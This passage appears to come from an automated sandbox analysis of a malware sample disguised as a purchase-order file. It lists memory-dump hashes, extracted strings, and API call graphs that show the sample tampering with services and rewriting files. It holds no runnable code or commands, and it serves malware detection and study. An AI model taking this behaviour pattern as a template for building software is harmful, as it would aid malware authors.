• Instruction Fuzzy Hash: AA11D376504280CFDB15CF54D5C4B16BFB2FB88324F28C6A9DC490B696C336D45ACBA2
Memory Dump Source
• Source File: 00000000.00000002.1419351532.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_301d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
• Instruction ID: 30956e1550d8f335a7e23de099815a48236b44264a711158a5fbf8c9566b60e8
• Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
• Instruction Fuzzy Hash: 5711DD75504280DFCB05CF14C5C0B25FBB2FB84324F28C6ADD8494B696C33AD41ACB61
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50769e4aec267f30b03ceb5e291d77b05928b543db7c1697a685d6c69f1e0539
• Instruction ID: bd65ca078ece470e4767ea62a0c3cc46097af349a720c0101fead6fe11cd6d71
• Opcode Fuzzy Hash: 50769e4aec267f30b03ceb5e291d77b05928b543db7c1697a685d6c69f1e0539
• Instruction Fuzzy Hash: 3901F7311093449AF7209A95CC84B2BFBDCDF41235F08C95AED0C0A2C2E6399845CAB2
Memory Dump Source
• Source File: 00000000.00000002.1419032279.000000000300D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0300D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300d000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dfec921a8667073d0356b4748974c712bf4ae07de45a8e8f869392c310afbe39
• Instruction ID: 20836897613404f3bcae72e25011fa3047e4367157a9853efc250d97137b9029
• Opcode Fuzzy Hash: dfec921a8667073d0356b4748974c712bf4ae07de45a8e8f869392c310afbe39
• Instruction Fuzzy Hash: 65F0C232005344AEE7109E56C888B67FFECEB81234F18C55AED0C0A2C6D2799844CBB1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: 4'q$TJq$Teq$pq$xbq
• API String ID: 0-4142780942
• Opcode ID: 5b2294d31e22e43611d592ded334b6d7b334fce45922172648457ff9db9b8bb5
• Instruction ID: 803cfd5e75d6e1cdaff0eebc297c091718cf1aada834b9c23d3ba3867aa37b7b
• Opcode Fuzzy Hash: 5b2294d31e22e43611d592ded334b6d7b334fce45922172648457ff9db9b8bb5
• Instruction Fuzzy Hash: 1CB2BF74E00628CFDB65CF69C984BD9BBB2BF89304F1581E9D509AB265DB319E81CF40
Strings
Memory Dump Source
• Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: TJq$Teq$xbq
• API String ID: 0-4091408781
• Opcode ID: a96aa8231baa18dcffda35cd930618be3304c3dab509cdffcbf4607000ada4c7
• Instruction ID: 4bb23161003c189731160d3ec9c9c74478f5885bb510d2177726deed90dcfde7
• Opcode Fuzzy Hash: a96aa8231baa18dcffda35cd930618be3304c3dab509cdffcbf4607000ada4c7
• Instruction Fuzzy Hash: 19C1C275E016588FDB59CF6AC944AD9BBF2BF89300F14C1EAD408AB365DB305A85CF50
Strings
Memory Dump Source
• Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
Similarity
• API ID:
• String ID: CB7
• API String ID: 0-594655847
• Opcode ID: a738c4353ea0da7288b5355f9c4a410a0db8be56a42ad16967b60b8aea0d6eb9
• Instruction ID: ea85fd8a7f68493ed4f014f26c7146b63dd649de2b709f406ee863e1a6e281b0
• Opcode Fuzzy Hash: a738c4353ea0da7288b5355f9c4a410a0db8be56a42ad16967b60b8aea0d6eb9
• Instruction Fuzzy Hash: 3E41B075F2420ACFCB44CB6CC9815BEB7F2BB88300F15A966D415EB391D634D9019B91
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1437311328.0000000005700000.00000040.00000800.00020000.00000000.sdmp, Offset: 05700000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5700000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CB7
                                                                                                                                                                      • API String ID: 0-594655847
                                                                                                                                                                      • Opcode ID: 9f9f21e23dbd0906bb319e1a55495752d9f8887466afad34edf8cc07c977f1e5
                                                                                                                                                                      • Instruction ID: 103771460c6d231393ecf4d6cac1e72bafb3c681ae43d1be1430733481c0bc81
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f9f21e23dbd0906bb319e1a55495752d9f8887466afad34edf8cc07c977f1e5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9431DDB5F2021ACFCB44CF6CC9815AEBBF6BB88310F14A866D415EB391D630DD019B91
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a8d58085805926972231e3c7aa3d0b6ceeea81bbc2f4e0077c4a4f731ed2d28b
                                                                                                                                                                      • Instruction ID: 674da2eb90660d2231be313f690a5049c9348e9723bbea5a114dd278918f19bb
                                                                                                                                                                      • Opcode Fuzzy Hash: a8d58085805926972231e3c7aa3d0b6ceeea81bbc2f4e0077c4a4f731ed2d28b
                                                                                                                                                                      • Instruction Fuzzy Hash: 98E1FC74E102598FDB14CFA9C5809AEFBB2FF89304F248169D415AB395DB35AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f74034669a98ad8d38def81d084f53d166ed12e4b17280a29512cb636f29702e
                                                                                                                                                                      • Instruction ID: 0c1d46da324f0e691d42b2a3b51a624a4c7673fa430e6415952e2b6ba27d6e86
                                                                                                                                                                      • Opcode Fuzzy Hash: f74034669a98ad8d38def81d084f53d166ed12e4b17280a29512cb636f29702e
                                                                                                                                                                      • Instruction Fuzzy Hash: 07E1FB74E102198FDB14CFA9C580AAEFBB2FF89304F248169D455AB395DB35AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 33b61bff8ad4c31de4d37f89ed4b25858c2356506140f667039eb029a03d6c7a
                                                                                                                                                                      • Instruction ID: 5f851bb1b1a25532ec1b168676411b5b40976d155468795b707409f7040167fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 33b61bff8ad4c31de4d37f89ed4b25858c2356506140f667039eb029a03d6c7a
                                                                                                                                                                      • Instruction Fuzzy Hash: 87E10C74E102598FDB14CFA9C580AAEFBB2FF49304F2481A9D415AB395DB31AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4da7c0d25951a8c3d7768c2c3868c52fe3b93eb6c697b09a7fb872502a4d5cf8
                                                                                                                                                                      • Instruction ID: 80db13ed1b16c78d081cb97b8942d3108f8c8d1308b60c7bb9f7d02cfad10531
                                                                                                                                                                      • Opcode Fuzzy Hash: 4da7c0d25951a8c3d7768c2c3868c52fe3b93eb6c697b09a7fb872502a4d5cf8
                                                                                                                                                                      • Instruction Fuzzy Hash: A2E1EB74E102198FDB14DFA9C580AAEFBB2FF89304F248169D415AB395DB35AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 505074b5890906e012592cf798316f40d86d76426a16dfe7f40ef7433569d0fc
                                                                                                                                                                      • Instruction ID: 7b62dc2dbe5ae3adfea6a12263b6bc7dadba6e9d7be3c7d0744426391e251d48
                                                                                                                                                                      • Opcode Fuzzy Hash: 505074b5890906e012592cf798316f40d86d76426a16dfe7f40ef7433569d0fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 86E1EC74E102198FDB14DFA9C580AAEFBB2FF89304F2481A9D415A7395DB35AD42CF60
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d266e073e9c962b22a9785cad2e0b8b38428f99e3e56b610f4ed9683c118c82b
                                                                                                                                                                      • Instruction ID: b163dbe1d2129245df788f0b92fd9814d51a3191309bf7bb2c4dd14cc99c5943
                                                                                                                                                                      • Opcode Fuzzy Hash: d266e073e9c962b22a9785cad2e0b8b38428f99e3e56b610f4ed9683c118c82b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51EA74E102198BDB14CFA9C5815AEBBF2FF89304F2481A9D418A7355DB359D42CF61
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1827b66b2f96634c6f6579474938deab1a4ef34180e352b959fe369a43f739ad
                                                                                                                                                                      • Instruction ID: 2743b4b5cb92ce87ca007afc4d393293cbf0c989175905ce0be3724e5c026b1c
                                                                                                                                                                      • Opcode Fuzzy Hash: 1827b66b2f96634c6f6579474938deab1a4ef34180e352b959fe369a43f739ad
                                                                                                                                                                      • Instruction Fuzzy Hash: 1F512974E102198BDB14CFA9C5806AEFBF2FF89300F2481A9D418A7355DB31AD42CFA1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1465375602.000000000B500000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B500000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_b500000_RFQ_PO N89397-GM7287-Order.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6f37d36ed07ecb98d4ea9671748d70c8249ddd70021d750b162f70ace60cfb83
                                                                                                                                                                      • Instruction ID: 01b13dd1ff747c724b2149132609ce88f5c9bfb2da0d5735b93a7400565d51fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f37d36ed07ecb98d4ea9671748d70c8249ddd70021d750b162f70ace60cfb83
                                                                                                                                                                      • Instruction Fuzzy Hash: B1511874E102198FDB14CFA9C5805AEBBF2FF89300F2481A9D418AB356DB359E42CF61

Execution Graph

Execution Coverage: 5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 13.3%
Total number of Nodes: 376
Total number of Limit Nodes: 65
61802->61782 61802->61783 61802->61784 61802->61785 61802->61788 61802->61789 61802->61790 61802->61796 61802->61799 61802->61800 61802->61801 61804 f6890b LocalFree 61802->61804 61802->61806 61803->61806 61804->61802 61805->61800 61806->61780 61807 f4fbc6 61809 f4ea10 61807->61809 61808 f4f8d4 SetFilePointerEx 61808->61809 61809->61808 61811 f4e539 61809->61811 61816 f4e590 61809->61816 61810 f4e59e SetFilePointerEx 61810->61816 61812 f4e6ed 61813 f45f10 SetFilePointerEx 61812->61813 61815 f4e70a 61813->61815 61814 f4e7ac SetFilePointerEx 61814->61816 61816->61810 61816->61811 61816->61812 61816->61814 61817 f502c6 61819 f4fe2b 61817->61819 61818 f4fe39 61820 f4fe4b SetFilePointerEx 61818->61820 61824 f4e539 61818->61824 61819->61817 61819->61818 61819->61824 61828 f4e590 61819->61828 61821 f4fb97 61820->61821 61822 f4e7ac SetFilePointerEx 61822->61828 61823 f4e6ed 61826 f45f10 SetFilePointerEx 61823->61826 61825 f4e59e SetFilePointerEx 61825->61828 61827 f4e70a 61826->61827 61828->61822 61828->61823 61828->61824 61828->61825 61829 f4e687 61830 f4e8d6 WriteFile 61829->61830 61831 f4e6a8 61829->61831 61836 f4e590 61830->61836 61831->61830 61831->61836 61832 f4e59e SetFilePointerEx 61832->61836 61833 f4e6ed 61834 f45f10 SetFilePointerEx 61833->61834 61837 f4e70a 61834->61837 61835 f4e7ac SetFilePointerEx 61835->61836 61836->61832 61836->61833 61836->61835 61838 f4e539 61836->61838 61839 f50106 61840 f4e7f3 ReadFile 61839->61840 61842 f4f9ac 61839->61842 61841 f4e7ee 61840->61841 61849 f4e590 61840->61849 61843 f4e59e SetFilePointerEx 61843->61849 61844 f4e539 61845 f4e6ed 61846 f45f10 SetFilePointerEx 61845->61846 61848 f4e70a 61846->61848 61847 f4e7ac SetFilePointerEx 61847->61849 61849->61843 61849->61844 61849->61845 61849->61847 61850 f50003 61851 f45f10 SetFilePointerEx 61850->61851 61852 f5000a 61851->61852 61853 f4520c 61856 f6cbd0 61853->61856 61855 f45211 61874 f6be50 61856->61874 61857 f6c168 61893 f6a905 LocalFree 61857->61893 61859 f45d20 2 API calls 
61859->61874 61860 f6c78e CloseServiceHandle 61860->61874 61861 f6bffd StrStrIW 61861->61874 61862 f6c706 StrStrIW 61862->61874 61864 f6bf68 StrStrIW 61864->61874 61865 f6c72b StrStrIW 61865->61874 61866 f6c0fd CloseServiceHandle 61866->61874 61867 f6c399 StrStrIW 61870 f6c3a9 61867->61870 61867->61874 61868 f6bf7e 61871 f6c7e4 StartServiceW 61868->61871 61872 f6c36b OpenServiceW 61868->61872 61870->61855 61871->61874 61872->61874 61873 f6c65a ChangeServiceConfigW 61873->61874 61875 f6bfe9 61873->61875 61874->61855 61874->61856 61874->61857 61874->61859 61874->61860 61874->61861 61874->61862 61874->61864 61874->61865 61874->61866 61874->61867 61874->61868 61874->61871 61874->61873 61874->61875 61876 f4ce90 61874->61876 61892 f6a350 CloseServiceHandle 61874->61892 61875->61855 61887 f4cc9b 61876->61887 61877 f4d5c5 CreateFileW 61877->61887 61878 f4d729 GetFileSizeEx 61880 f4d8a1 CloseHandle 61878->61880 61878->61887 61880->61887 61881 f4d42a CloseHandle 61881->61887 61882 f4cd5c lstrcmpiW 61882->61887 61883 f4cca0 lstrcmpiW 61883->61887 61885 f4d049 SetFilePointerEx 61885->61887 61886 f4cc92 61886->61874 61887->61874 61887->61876 61887->61877 61887->61878 61887->61880 61887->61881 61887->61882 61887->61883 61887->61885 61887->61886 61888 f45d20 VirtualAlloc VirtualFree 61887->61888 61889 f4d378 CloseHandle 61887->61889 61890 f4d426 61887->61890 61891 f4cfbb GetFileTime 61887->61891 61894 f48937 VirtualAlloc VirtualFree 61887->61894 61895 f48470 VirtualAlloc VirtualFree 61887->61895 61888->61887 61889->61887 61890->61880 61890->61881 61891->61887 61892->61874 61893->61875 61894->61887 61896 f4958f 61898 f48e26 61896->61898 61897 f4b180 4 API calls 61897->61898 61898->61897 61899 f484ad 61898->61899 61900 70b0ef0 61901 70b0efc 61900->61901 61902 70b0f07 61901->61902 61905 70b22d9 61901->61905 61908 70b514a 61901->61908 61911 70bf3a8 61905->61911 61910 70bf3a8 VirtualProtect 61908->61910 61909 70b516c 61910->61909 61913 70bf3cf 61911->61913 61915 70bf4c0 61913->61915 
61916 70bf509 VirtualProtect 61915->61916 61918 70b22f5 61916->61918 61919 f4b80f 61920 f4b828 WriteFile 61919->61920 61921 f4bb0a 61923 f4bb28 61921->61923 61922 f49cb2 61923->61922 61924 f4bdd0 61923->61924 61931 f4a7d8 61923->61931 61925 f4bdd4 SetFilePointerEx 61924->61925 61928 f4b9fe 61924->61928 61925->61924 61926 f4a9a0 GetFileSize 61926->61931 61936 f484ad 61926->61936 61927 f4be1c 61928->61927 61929 f4bd43 SetFilePointerEx 61928->61929 61930 f4bd68 61929->61930 61931->61926 61932 f49ad5 61931->61932 61931->61936 61937 f48e26 61931->61937 61934 f45f10 SetFilePointerEx 61932->61934 61932->61936 61933 f4b180 4 API calls 61933->61937 61935 f49aea 61934->61935 61937->61933 61937->61936
Strings
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID: d$w
• API String ID: 0-2400632791
• Opcode ID: a1a0c2e952d37856a68cef45baed786306aee67e0cbcf24f09bf12ec603c5637
• Instruction ID: 79ba990036e9d1850779055a0b1d3d30286f1685b70b5dea109740e32a481210
• Opcode Fuzzy Hash: a1a0c2e952d37856a68cef45baed786306aee67e0cbcf24f09bf12ec603c5637
• Instruction Fuzzy Hash: 5EC12721E0C380AFDA359A648C19B753B649F72770F8D0156E5D6CA0F3D71A9C44B6E2
APIs
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: ErrorLastwsprintf
• String ID:
• API String ID: 2587402804-0
• Opcode ID: c15d6a15d2e8a02e1cd25b4513d9cea5a3604068d2d658e054be4d623b898f20
• Instruction ID: 7f2ac9fb20d102d1aecaab24aaafb8d3728c5cde9a893226e0d2789502c9a7d9
• Opcode Fuzzy Hash: c15d6a15d2e8a02e1cd25b4513d9cea5a3604068d2d658e054be4d623b898f20
• Instruction Fuzzy Hash: 30F13761D0C381AACB3556288C19B753BA05B727F4F5C0B8EE562971F2DD658C0BB323
APIs
• OpenProcessToken.ADVAPI32(?,00000008), ref: 00F4838F
• CloseHandle.KERNELBASE ref: 00F4839F
Strings
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: CloseHandleOpenProcessToken
• String ID: $AQu
• API String ID: 3879341014-1472930311
• Opcode ID: 3f5860abf9943705f6f1761d6aed33b7c52103a98d3a9bdc559da42b1b15551d
• Instruction ID: 40ea2fea841611aa64a72de268ebc223a513376f393fbc79997ca6f8b5365e30
• Opcode Fuzzy Hash: 3f5860abf9943705f6f1761d6aed33b7c52103a98d3a9bdc559da42b1b15551d
• Instruction Fuzzy Hash: 78B20331E0C3819BCB369B1888446357F60ABA3735F5D82DADE85CB1A3D6659C0AF353
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c10da4cabbb9f6fa63b6073af8339c1632afd2cbf252d8cc352f4c8bf6857c0
• Instruction ID: cf14d31361f8306993cf8b8ab5dbbf172e014c731d29ba5d6e2ac482e47ee7be
• Opcode Fuzzy Hash: 1c10da4cabbb9f6fa63b6073af8339c1632afd2cbf252d8cc352f4c8bf6857c0
• Instruction Fuzzy Hash: 84E02B5EE4820075DB391E189C55D387D5476B5730E981716DC7A421D096965E043053
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dff88ddd41cfaf2dfdc34ab88f9b967fe7d504408445125d40944be4b6b3ed3c
• Instruction ID: 961a1228a227ab041fa1b94f435cbe9621185b420f28975a810bbb53f9868b93
• Opcode Fuzzy Hash: dff88ddd41cfaf2dfdc34ab88f9b967fe7d504408445125d40944be4b6b3ed3c
• Instruction Fuzzy Hash: D1221D21D0E3809FDB768B2888187367FA05FA2734F0D559AEC95471E2D6799D08F3A3
Strings
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID: tu
• API String ID: 0-2479440269
• Opcode ID: 041eb42ef0ba21f1f17647b44505322d585c23608eab0971a012b00da6138b0d
• Instruction ID: 926d147ed607f142e72311e02efd8f53ddaaf22596edc79b79dada8a87c4c89e
• Opcode Fuzzy Hash: 041eb42ef0ba21f1f17647b44505322d585c23608eab0971a012b00da6138b0d
• Instruction Fuzzy Hash: 09C10426D0E3805BDB768628481473A7FA06FA2770F4D558AEC858B1E3D769CC05F393
Strings
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID:
• String ID: SWVtvut$tu
• API String ID: 0-794884318
• Opcode ID: ec4e90ef424b724876babbd535a61fbaa51e0266815ebecec36beaa531363642
• Instruction ID: 3644b8fb620b1fb36c4ed454b3aed4bb047fcebee359931f4c0a8403190dd776
• Opcode Fuzzy Hash: ec4e90ef424b724876babbd535a61fbaa51e0266815ebecec36beaa531363642
• Instruction Fuzzy Hash: 80917461D4D3819ED722CB298814777BFA05BA2370F0D868AECA58B1E3D2748D08F753

Control-flow Graph

control_flow_graph 3057 f4b180-f4b18f 3058 f4b2a3 3057->3058 3059 f4b2a5 3058->3059 3060 f4b306-f4b30b 3058->3060 3059->3060 3061 f4b2a7-f4b2c0 SetFilePointerEx 3059->3061 3066 f4b196-f4b1ba 3060->3066 3067 f4b23b 3060->3067 3064 f4b2c6 3061->3064 3065 f4b38d-f4b395 3061->3065 3064->3065 3068 f4b2cc-f4b2d0 3064->3068 3072 f4b3a6-f4b3ac 3066->3072 3073 f4b1c0 3066->3073 3067->3066 3069 f4b241 3067->3069 3070 f4b2d6 3068->3070 3071 f4b1df-f4b1e6 3068->3071 3069->3060 3076 f4b247 3069->3076 3070->3071 3077 f4b2dc-f4b2de 3070->3077 3074 f4b3b2-f4b3b7 3072->3074 3075 f4b328-f4b346 SetFilePointerEx 3072->3075 3073->3072 3078 f4b1c6-f4b1d3 3073->3078 3081 f4b322 3076->3081 3082 f4b24d 3076->3082 3079 f4b2e0-f4b2ed WriteFile 3077->3079 3078->3079 3080 f4b1d9 3078->3080 3080->3071 3080->3079 3081->3075 3084 f4b0d0-f4b0d8 SetFilePointerEx 3081->3084 3082->3081 3083 f4b253-f4b262 3082->3083 3085 f4b054-f4b061 3084->3085 3086 f4b0de-f4b0e2 3084->3086 3086->3057
APIs
• SetFilePointerEx.KERNELBASE ref: 00F4B2BA
• WriteFile.KERNELBASE(?,?,00000004,?,00000000), ref: 00F4B2E0
Memory Dump Source
• Source File: 00000009.00000002.2648945489.0000000000F44000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f44000_vbc.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: 689bbe895197017e3100b6c9de269d6d4086c1e24d7567a1a697849ea8add19f
• Instruction ID: 3c970b5888d6fcdda2e6e3a310fae8d3484dd13b152c3f6e1d5014f40a599a59
• Opcode Fuzzy Hash: 689bbe895197017e3100b6c9de269d6d4086c1e24d7567a1a697849ea8add19f
• Instruction Fuzzy Hash: 1C31727180C3849ED7118F2A881977BBFE4AF96734F48854DEC9486293D3B9D908B753

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 3089 9f1eeb0-9f1eed6 3092 9f1ef06-9f1ef0e 3089->3092 3093 9f1eed8-9f1ef00 call 9f1c3ac call 9f1c3e4 3089->3093 3094 9f1ef10-9f1ef15 call 9f1c4dc 3092->3094 3095 9f1ef54-9f1ef8e call 9f1c4e8 3092->3095 3093->3092 3103 9f1f10c-9f1f132 3093->3103 3100 9f1ef1a-9f1ef4f 3094->3100 3113 9f1ef94-9f1efdf 3095->3113 3114 9f1f139-9f1f16b 3095->3114 3110 9f1efe2-9f1f044 call 9f1c3ac call 9f1c4f4 3100->3110 3103->3114 3139 9f1f100-9f1f10b 3110->3139 3140 9f1f04a-9f1f057 3110->3140 3113->3110 3129 9f1f172-9f1f964 CreateWindowExW 3114->3129 3147 9f1f966-9f1f96c 3129->3147 3148 9f1f96d-9f1f9d8 3129->3148 3144 9f1f05d-9f1f08a call 9f1c3ac call 9f1c4e8 3140->3144 3145 9f1f0fc-9f1f0fe 3140->3145 3144->3145 3161 9f1f08c-9f1f099 3144->3161 3145->3129 3145->3139 3147->3148 3156 9f1f9e5 3148->3156 3157 9f1f9da-9f1f9dd 3148->3157 3160 9f1f9e6 3156->3160 3157->3156 3160->3160 3161->3145 3162 9f1f09b-9f1f0b2 call 9f1c3ac call 9f1c500 3161->3162 3167 9f1f0b4-9f1f0bd call 9f1c4f4 3162->3167 3168 9f1f0bf-9f1f0ee call 9f1c4f4 3162->3168 3167->3145 3168->3145 3176 9f1f0f0-9f1f0fa 3168->3176 3176->3145 3176->3168
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 09F1C3AC: GetModuleHandleW.KERNELBASE(?), ref: 09F1D6BA
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 09F1F951
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.2755656125.0000000009F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09F10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_9f10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHandleModuleWindow
                                                                                                                                                                      • String ID: 0$[A@i^
                                                                                                                                                                      • API String ID: 1178124398-1524683153
                                                                                                                                                                      • Opcode ID: c7195831ca29befead0414fc1bf3cf152a7fdf075fb9c5b4a6f75413d636c864
                                                                                                                                                                      • Instruction ID: f347b9eb4995408eca00d0252c40e3dab3fcbc2b58eb350b7aa713d642214a7a
